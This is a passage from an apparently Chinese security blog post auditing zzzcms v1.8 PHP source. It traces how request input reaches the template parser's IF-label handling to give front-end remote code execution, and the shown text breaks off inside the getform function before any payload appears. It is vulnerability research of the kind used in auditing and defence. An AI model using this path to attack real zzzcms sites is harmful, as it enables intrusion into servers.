<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset="utf-8">
    
    <title>zzzcms前台RCE | hungry and humble</title>
    
    
        <meta name="keywords" content="PHP代码审计" />
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="弄了个博客发一篇文章来测试一下，这是十月份在公司审计的一个cms当时的最新版存在的一个可以shell的rce，有一个payload很有意思记得好像是参考的安全客的一篇文章，然后自己构造了一个payload也能打成功。 漏洞分析1.首先到zzzcms的官网上下载zzzcms v1.8的安装包。 2.入口文件index.php 12&lt;?phprequire &#39;inc&#x2F;zzz_c">
<meta property="og:type" content="article">
<meta property="og:title" content="zzzcms前台RCE">
<meta property="og:url" content="https://little-gu.github.io/2020/02/13/zzzcms/index.html">
<meta property="og:site_name" content="hungry and humble">
<meta property="og:description" content="弄了个博客发一篇文章来测试一下，这是十月份在公司审计的一个cms当时的最新版存在的一个可以shell的rce，有一个payload很有意思记得好像是参考的安全客的一篇文章，然后自己构造了一个payload也能打成功。 漏洞分析1.首先到zzzcms的官网上下载zzzcms v1.8的安装包。 2.入口文件index.php 12&lt;?phprequire &#39;inc&#x2F;zzz_c">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://little-gu.github.io/2020/02/13/zzzcms/Users/eva/AppData/Roaming/Typora/typora-user-images/image-20201019101039399.png">
<meta property="og:image" content="https://little-gu.github.io/2020/02/13/zzzcms/Users/eva/AppData/Roaming/Typora/typora-user-images/image-20201019102614797.png![image-20201019104046447](C:/Users/eva/AppData/Roaming/Typora/typora-user-images/image-20201019104046447.png">
<meta property="og:image" content="https://little-gu.github.io/2020/02/13/zzzcms/Users/eva/AppData/Roaming/Typora/typora-user-images/image-20201019105200703.png">
<meta property="article:published_time" content="2020-02-13T04:02:53.000Z">
<meta property="article:modified_time" content="2021-12-12T06:06:31.375Z">
<meta property="article:author" content="G7shot">
<meta property="article:tag" content="PHP代码审计">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://little-gu.github.io/2020/02/13/zzzcms/Users/eva/AppData/Roaming/Typora/typora-user-images/image-20201019101039399.png">
    

    
        <link rel="alternate" href="/atom.xml" title="hungry and humble" type="application/atom+xml" />
    

    
        <link rel="icon" href="/ckrie.jpg" />
    

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/libs/open-sans/styles.css">

    
<link rel="stylesheet" href="/libs/source-code-pro/styles.css">


    
<link rel="stylesheet" href="/css/style.css">

    
<script src="/libs/jquery/2.1.3/jquery.min.js"></script>

    
<script src="/libs/jquery/plugins/cookie/1.4.1/jquery.cookie.js"></script>

    
    
        
<link rel="stylesheet" href="/libs/lightgallery/css/lightgallery.min.css">

    
    
        
<link rel="stylesheet" href="/libs/justified-gallery/justifiedGallery.min.css">

    
    
    
    


    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
<meta name="generator" content="Hexo 5.3.0"></head>

<body>
    <div id="container">
        <header id="header">
    <div id="header-main" class="header-inner">
        <div class="outer">
            <a href="/" id="logo">
                <i class="logo"></i>
                <span class="site-title">hungry and humble</span>
            </a>
            <nav id="main-nav">
                
                    <a class="main-nav-link" href="/">index</a>
                
                    <a class="main-nav-link" href="/archives">archives</a>
                
                    <a class="main-nav-link" href="/about">about</a>
                
                    <a class="main-nav-link" href="/notes">notes</a>
                
            </nav>
            
            <div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="Search" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div>
        </div>
    </div>
    <div id="main-nav-mobile" class="header-sub header-inner">
        <table class="menu outer">
            <tr>
                
                    <td><a class="main-nav-link" href="/">index</a></td>
                
                    <td><a class="main-nav-link" href="/archives">archives</a></td>
                
                    <td><a class="main-nav-link" href="/about">about</a></td>
                
                    <td><a class="main-nav-link" href="/notes">notes</a></td>
                
                <td>
                    
    <div class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="Search" />
    </div>

                </td>
            </tr>
        </table>
    </div>
</header>

        <div class="outer">
            
            
                <aside id="sidebar">
   
        
    <div class="widget-wrap" id='categories'>
        <h3 class="widget-title">
            <span>categories</span>
            &nbsp;
            <a id='allExpand' href="#">
                <i class="fa fa-angle-double-down fa-2x"></i>
            </a>
        </h3>
        
        
        
         <ul class="unstyled" id="tree" > 
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            .net
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/01/25/viewstate%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AE%9E%E6%88%98/">viewstate反序列化实战</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory open">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder-open"></i>
                            &nbsp;
                            PHP代码审计
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file active"><a href="/2020/02/13/zzzcms/">zzzcms前台RCE</a></li>  <li class="file"><a href="/2020/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/">审计某cms到insert注入技巧</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            Python
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/12/02/github%E6%B3%84%E9%9C%B2%E5%B7%A5%E5%85%B7%E6%B5%8B%E8%AF%95/">github泄露工具测试</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            java
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/02/16/cc1%E9%93%BE/">cc1链</a></li>  <li class="file"><a href="/2020/03/19/cc2%E9%93%BE/">cc2链</a></li>  <li class="file"><a href="/2020/04/19/cc5%E9%93%BE/">cc5链</a></li>  <li class="file"><a href="/2021/04/03/%E7%BB%93%E5%90%88%E4%B8%A4%E6%9D%A1cc%E9%93%BE%E5%88%86%E6%9E%90ysoserial%E5%AE%9E%E7%8E%B0/">结合两条cc链分析ysoserial实现</a></li>  <li class="file"><a href="/2021/10/09/fastjson%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/">fastjson不出网利用</a></li>  <li class="file"><a href="/2021/12/02/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%8B%BF%E4%B8%8Bjava%E7%AB%99%E4%B9%8B%E5%90%8E%E7%9A%84%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%A7%A3%E5%86%B3/">记一次拿下java站之后的负载均衡解决</a></li>  <li class="file"><a href="/2021/12/07/java%E5%8F%91%E5%BA%8F%E5%88%97%E5%8C%96%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E7%B1%BB%E7%9A%84%E5%88%A9%E7%94%A8/">java发序列化执行任意类的利用</a></li>  <li class="file"><a href="/2022/01/08/%E5%88%A9%E7%94%A8urldns%E5%8E%9F%E7%94%9F%E9%93%BE%E6%8E%A2%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E7%9B%B8%E5%BA%94%E7%89%88%E6%9C%AC%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E9%93%BE/">利用urldns原生链探测是否存在相应版本的反序列链</a></li>  <li class="file"><a href="/2022/01/10/log4j2%E6%9D%82%E8%B0%88/">log4j2杂谈</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            注入
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2020/03/04/%E6%94%BB%E5%87%BB%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B9%8Bmssql/">攻击数据库之mssql</a></li>  <li class="file"><a href="/2020/12/08/%E6%94%BB%E5%87%BB%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B9%8Bdb2/">攻击数据库之db2</a></li>  <li class="file"><a href="/2021/12/05/%E8%8B%9B%E5%88%BB%E7%8E%AF%E5%A2%83%E4%B8%8Bmssql%E6%B3%A8%E5%85%A5/">苛刻环境下mssql注入</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            渗透
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/06/29/non-rce-ctf%E5%A4%8D%E7%8E%B0/">non-rce-ctf复现</a></li>  <li class="file"><a href="/2021/11/25/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E6%B8%97%E9%80%8Fselenium-server/">记一次曲折渗透selenium-server</a></li>  <li class="file"><a href="/2021/12/03/%E5%AE%9E%E6%88%98host%E7%A2%B0%E6%92%9E%E5%88%B0%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">实战host碰撞到代码审计</a></li>  </ul> 
                    </li> 
                     <li class="file"><a href="/2021/02/13/test/">test</a></li>  </ul> 
    </div>
    <script>
        $(document).ready(function() {
            var iconFolderOpenClass  = 'fa-folder-open';
            var iconFolderCloseClass = 'fa-folder';
            var iconAllExpandClass = 'fa-angle-double-down';
            var iconAllPackClass = 'fa-angle-double-up';
            // Handle directory-tree expansion:
            // 左键单独展开目录
            $(document).on('click', '#categories a[data-role="directory"]', function (event) {
                event.preventDefault();

                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var subtree = $(this).siblings('ul');
                icon.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if (expanded) {
                    if (typeof subtree != 'undefined') {
                        subtree.slideUp({ duration: 100 });
                    }
                    icon.addClass(iconFolderCloseClass);
                } else {
                    if (typeof subtree != 'undefined') {
                        subtree.slideDown({ duration: 100 });
                    }
                    icon.addClass(iconFolderOpenClass);
                }
            });
            // 右键展开下属所有目录
            $('#categories a[data-role="directory"]').bind("contextmenu", function(event){
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var listNode = $(this).siblings('ul');
                var subtrees = $.merge(listNode.find('li ul'), listNode);
                var icons = $.merge(listNode.find('.fa'), icon);
                icons.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if(expanded) {
                    subtrees.slideUp({ duration: 100 });
                    icons.addClass(iconFolderCloseClass);
                } else {
                    subtrees.slideDown({ duration: 100 });
                    icons.addClass(iconFolderOpenClass);
                }
            })
            // 展开关闭所有目录按钮
            $(document).on('click', '#allExpand', function (event) {
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconAllExpandClass);
                icon.removeClass(iconAllExpandClass).removeClass(iconAllPackClass);
                if(expanded) {
                    $('#sidebar .fa.fa-folder').removeClass('fa-folder').addClass('fa-folder-open')
                    $('#categories li ul').slideDown({ duration: 100 });
                    icon.addClass(iconAllPackClass);
                } else {
                    $('#sidebar .fa.fa-folder-open').removeClass('fa-folder-open').addClass('fa-folder')
                    $('#categories li ul').slideUp({ duration: 100 });
                    icon.addClass(iconAllExpandClass);
                }
            });  
        });
    </script>

    
    <div id="toTop" class="fa fa-angle-up"></div>
</aside>
            
            <section id="main"><article id="post-zzzcms" class="article article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
        
            <header class="article-header">
                
                    <div class="article-meta">
                        
    <div class="article-category">
    	<i class="fa fa-folder"></i>
        <a class="article-category-link" href="/categories/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a>
    </div>

                        
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link-link" href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">PHP代码审计</a>
    </div>

                        
    <div class="article-date">
        <i class="fa fa-calendar"></i>
        <a href="/2020/02/13/zzzcms/">
            <time datetime="2020-02-13T04:02:53.000Z" itemprop="datePublished">2020-02-13</time>
        </a>
    </div>


                        
                            <i class="fa fa-bar-chart"></i>
                            <span id="busuanzi_container_site_pv"><span id="busuanzi_value_page_pv"></span></span>    
                        
                        
                            <div class="article-meta-button">
                                <a target="_blank" rel="noopener" href='https://github.com/zthxxx/Wiki-site/raw/writing/source/_posts/zzzcms.md'> Source </a>
                            </div>
                            <div class="article-meta-button">
                                <a target="_blank" rel="noopener" href='https://github.com/zthxxx/Wiki-site/edit/writing/source/_posts/zzzcms.md'> Edit </a>
                            </div>
                            <div class="article-meta-button">
                                <a target="_blank" rel="noopener" href='https://github.com/zthxxx/Wiki-site/commits/writing/source/_posts/zzzcms.md'> History </a>
                            </div>
                        
                    </div>
                
                
    
        <h1 class="article-title" itemprop="name">
            zzzcms前台RCE
        </h1>
    

            </header>
        
        
        <div class="article-entry" itemprop="articleBody">
        
        
            
        
        
            <p>弄了个博客发一篇文章来测试一下，这是十月份在公司审计的一个cms当时的最新版存在的一个可以shell的rce，有一个payload很有意思记得好像是参考的安全客的一篇文章，然后自己构造了一个payload也能打成功。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>1.首先到zzzcms的官网上下载zzzcms v1.8的安装包。</p>
<p>2.入口文件index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">require &#39;inc&#x2F;zzz_client.php&#39;;</span><br></pre></td></tr></table></figure>
<p>2.首先跟进zzz_client.php文件： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line">require &#39;zzz_template.php&#39;;</span><br><span class="line">if (conf(&#39;webmode&#39;)&#x3D;&#x3D;0) error(conf(&#39;closeinfo&#39;));</span><br><span class="line">$location&#x3D;getlocation();</span><br><span class="line">ParseGlobal(G(&#39;sid&#39;),G(&#39;cid&#39;));</span><br><span class="line">&#x2F;&#x2F;echop($location);die;</span><br><span class="line">switch ($location) &#123;</span><br><span class="line">case &#39;about&#39;:</span><br><span class="line">$tplfile&#x3D; TPL_DIR . G(&#39;stpl&#39;);</span><br><span class="line">break;</span><br><span class="line">case &#39;brand&#39;:</span><br><span class="line">$stpl&#x3D;splits(db_select(&#39;brand&#39;,&#39;b_template&#39;,&quot;bid&#x3D;&quot;.G(&#39;bid&#39;) or &quot;b_name&#x3D;&#39;&quot;.G(&#39;bname&#39;).&quot;&#39;&quot;),&#39;,&#39;);</span><br><span class="line">if (defined(&#39;ISWAP&#39;))&#123;</span><br><span class="line">$tplfile&#x3D;isset($stpl[1]) ? $stpl[1] : $stpl[0];</span><br><span class="line">&#125;else&#123;</span><br><span class="line">$tplfile&#x3D;$stpl[0];</span><br><span class="line">&#125;</span><br><span class="line">$tplfile&#x3D;empty($tplfile) ? TPL_DIR .&#39;brand.html&#39; : TPL_DIR . $tplfile ;</span><br><span class="line">break;</span><br><span class="line">case &#39;brandlist&#39;:</span><br><span class="line">$tplfile&#x3D;isset($stpl) ? TPL_DIR . $stpl: TPL_DIR . &#39;brandlist.html&#39;;</span><br><span class="line">$GLOBALS[&#39;tid&#39;]&#x3D;&#39;-1&#39;;</span><br><span class="line">break;</span><br><span class="line">case &#39;content&#39;:</span><br><span class="line">$tplfile&#x3D; TPL_DIR . G(&#39;ctpl&#39;);</span><br><span class="line">break;</span><br><span class="line">case &#39;list&#39;:</span><br><span class="line">$tplfile&#x3D; TPL_DIR . G(&#39;stpl&#39;);</span><br><span class="line">break;</span><br><span class="line">case &#39;taglist&#39;:</span><br><span class="line">$tplfile&#x3D;TPL_DIR . &#39;taglist.html&#39;;</span><br><span class="line">$GLOBALS[&#39;tid&#39;]&#x3D;&#39;-1&#39;;</span><br><span class="line">break;</span><br><span class="line">case &#39;user&#39;:</span><br><span class="line">$tplfile&#x3D; TPL_DIR . &#39;user.html&#39;;</span><br><span class="line">break;</span><br><span class="line">case &#39;search&#39;:</span><br><span class="line">$tplfile&#x3D; TPL_DIR . &#39;search.html&#39;;</span><br><span class="line">break;</span><br><span class="line">define(&#39;TPL_DIR&#39;, SITE_DIR . &#39;template&#x2F;pc&#x2F;&#39;.PCTPL.$data[&#39;pchtmlpath&#39;]); 将需要载入的模板的路径赋值给$tplfile</span><br><span class="line">elseif($conf[&#39;runmode&#39;]&#x3D;&#x3D;0|| $conf[&#39;runmode&#39;]&#x3D;&#x3D;2 || $location&#x3D;&#x3D;&#39;search&#39; ||$location&#x3D;&#x3D;&#39;form&#39; ||$location&#x3D;&#x3D;&#39;screen&#39; || $location&#x3D;&#x3D;&#39;app&#39;)&#123;</span><br><span class="line">$zcontent &#x3D; load_file($tplfile,$location);</span><br><span class="line">$parser &#x3D; new ParserTemplate();</span><br><span class="line">$zcontent &#x3D; $parser-&gt;parserCommom($zcontent); &#x2F;&#x2F; 解析模板</span><br><span class="line">echo $zcontent;</span><br></pre></td></tr></table></figure>
<p>3.然后会解析需要的模板，也是漏洞开始的地方，然后跟进\zzzcms\inc\zzz_template.php的parserCommom函数，其内部实现如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">class ParserTemplate &#123;</span><br><span class="line">    &#x2F;&#x2F; 解析全局公共标签</span><br><span class="line">    public</span><br><span class="line">    function parserCommom( $zcontent ) &#123;</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserSiteLabel( $zcontent ); &#x2F;&#x2F; 站点标签</span><br><span class="line">        $zcontent &#x3D; $this-&gt;ParseInTemplate( $zcontent ); &#x2F;&#x2F; 模板标签</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserConfigLabel( $zcontent ); &#x2F;&#x2F;配置表情</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserSiteLabel( $zcontent ); &#x2F;&#x2F; 站点标签    </span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserNavLabel( $zcontent ); &#x2F;&#x2F; 导航标签 </span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserCompanyLabel( $zcontent ); &#x2F;&#x2F; 公司标签</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserUser( $zcontent ); &#x2F;&#x2F;会员信息           </span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserlocation( $zcontent ); &#x2F;&#x2F; 站点标签  &#123; </span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserLoopLabel( $zcontent ); &#x2F;&#x2F; 循环标签        </span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserContentLoop( $zcontent ); &#x2F;&#x2F; 指定内容</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserbrandloop( $zcontent );</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserGbookList( $zcontent );        </span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserLabel( $zcontent ); &#x2F;&#x2F; 指定内容</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserPicsLoop( $zcontent ); &#x2F;&#x2F; 内容多图</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserad( $zcontent );</span><br><span class="line">        $zcontent &#x3D; parserPlugLoop( $zcontent );</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserOtherLabel( $zcontent );</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserIfLabel( $zcontent ); &#x2F;&#x2F; IF语句  漏洞点</span><br><span class="line">        $zcontent &#x3D; $this-&gt;parserNoLabel( $zcontent );</span><br><span class="line">        return $zcontent;</span><br><span class="line">&#125;</span><br><span class="line">…</span><br><span class="line">…&#x2F;&#x2F;  此处省略</span><br><span class="line">…</span><br><span class="line">…</span><br><span class="line">    private function parserlocation( $zcontent ) &#123;</span><br><span class="line">        $location &#x3D; G( &#39;location&#39; );</span><br><span class="line">        switch ( $location ) &#123;</span><br><span class="line">            case &#39;about&#39;:</span><br><span class="line">                $zcontent &#x3D; $this-&gt;parserAbout( $zcontent );</span><br><span class="line">                break;</span><br><span class="line">            case &#39;brand&#39;:</span><br><span class="line">                $zcontent &#x3D; $this-&gt;parserBrand( $zcontent );</span><br><span class="line">                break;</span><br><span class="line">            case &#39;content&#39;:</span><br><span class="line">                $zcontent &#x3D; $this-&gt;parserContent( $zcontent );</span><br><span class="line">                break;</span><br><span class="line">            case &#39;search&#39;:</span><br><span class="line">                $zcontent &#x3D; $this-&gt;parserSearch( $zcontent );&#x2F;&#x2F;</span><br><span class="line">                break;</span><br><span class="line">            case &#39;sublist&#39;:</span><br><span class="line">            case &#39;list&#39;:</span><br><span class="line">                $zcontent &#x3D; $this-&gt;parserList( $zcontent );</span><br><span class="line">                break;</span><br><span class="line">            case &#39;taglist&#39;:</span><br><span class="line">                $tag &#x3D; db_select( &#39;tag&#39;, &#39;t_name&#39;, &quot;t_enname&#x3D;&#39;&quot; . G( &#39;sid&#39; ) . &quot;&#39;&quot; );</span><br><span class="line">                $tag &#x3D; isset( $tag ) ? $tag : &#39;无效&#39;;</span><br><span class="line">                $zcontent &#x3D; str_replace( &#39;&#123;zzz:tag&#125;&#39;, $tag, $zcontent );</span><br><span class="line">                $zcontent &#x3D; $this-&gt;parserList( $zcontent );</span><br><span class="line">                break;</span><br><span class="line">        &#125;</span><br><span class="line">        return $zcontent;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>4.跟进parserlocation()函数，当$location的值为’search’时，调用parsersearch函数后函数返回$zcontent，然后渲染成HTML，因此重点关注parsersearch函数，其主要实现如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">function parserSearch( $zcontent ) &#123;</span><br><span class="line">    $pattern &#x3D; &#39;&#x2F;\&#123;zzz:search(\s+[^&#125;]+)?\&#125;([\s\S]*?)\&#123;\&#x2F;zzz:search\&#125;&#x2F;&#39;;</span><br><span class="line">    $pattern2 &#x3D; &#39;&#x2F;\[search:([\w]+)(\s+[^]]+)?\]&#x2F;&#39;;</span><br><span class="line">    if ( preg_match_all( $pattern, $zcontent, $matches ) ) &#123;</span><br><span class="line">        $count &#x3D; count( $matches[ 0 ] );</span><br><span class="line">        for ( $i &#x3D; 0; $i &lt; $count; $i++ ) &#123;</span><br><span class="line">            &#x2F;&#x2F; 获取调节参数</span><br><span class="line">            $params &#x3D; parserParam( $matches[ 1 ][ $i ] );</span><br><span class="line">            $where &#x3D; array( &#39;C_onoff&#39; &#x3D;&gt; 1 );$whereor&#x3D;&#39;&#39;;$type&#x3D;&#39;&#39;;</span><br><span class="line">            $colnum &#x3D; conf( &#39;pagesize&#39; );</span><br><span class="line">            $order &#x3D; array( &#39;istop&#39; &#x3D;&gt; &#39;desc&#39;, &#39;isgood&#39; &#x3D;&gt; &#39;desc&#39;, &#39;c_order&#39; &#x3D;&gt; &#39;asc&#39;, &#39;c_addtime&#39; &#x3D;&gt; &#39;desc&#39;, &#39;cid&#39; &#x3D;&gt; &#39;desc&#39; );</span><br><span class="line">            $sid &#x3D; G( &#39;sid&#39; );</span><br><span class="line">            $arr &#x3D; parse_url( $_SERVER[ &#39;REQUEST_URI&#39; ] );              </span><br><span class="line">            $size &#x3D; 10;</span><br><span class="line">            …</span><br><span class="line">            …</span><br><span class="line">            …</span><br><span class="line">            $norecord &#x3D;isset( $norecord ) ? $norecord : &#39;很抱歉，没有找到匹配内容！&#39; ;</span><br><span class="line">            $keys &#x3D; danger_key(getform( &#39;keys&#39;, &#39;cookie&#39; )); </span><br><span class="line">            if ( $sid ) arr_add( $where, &#39;c_sid&#39;, db_subsort( $sid ) );             </span><br><span class="line">            …</span><br><span class="line">            …</span><br><span class="line">            …</span><br><span class="line">            $zcontent &#x3D; $this-&gt;parserListPage( $zcontent );</span><br><span class="line">return $zcontent;</span><br></pre></td></tr></table></figure>
<p>5.然后到1829行$keys = danger_key(getform( ‘keys’, ‘cookie’ ))，其中调用了getform函数，getform函数会从REQUEST中获取keys的值，然后使用txt_html对$data进行编码，最后返回编码后的值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">function getform( $name, $source &#x3D; &#39;both&#39;, $type &#x3D; NULL, $default &#x3D; NULL  ) &#123;</span><br><span class="line">      switch ( $source ) &#123;</span><br><span class="line">            case &#39;post&#39;:</span><br><span class="line">                  $data &#x3D; _POST( $name );</span><br><span class="line">                  break;</span><br><span class="line">            case &#39;get&#39;:</span><br><span class="line">                  $data &#x3D; _GET( $name );</span><br><span class="line">                  break;</span><br><span class="line">            case &#39;cookie&#39;:</span><br><span class="line">                  $data &#x3D; _REQUEST($name);&#x2F;&#x2F;_REQUESTS(&#39;keys&#39;)</span><br><span class="line">            if($data) &#123;</span><br><span class="line">                 set_cookie( $name,$data ) ;</span><br><span class="line">            &#125;else&#123;</span><br><span class="line">                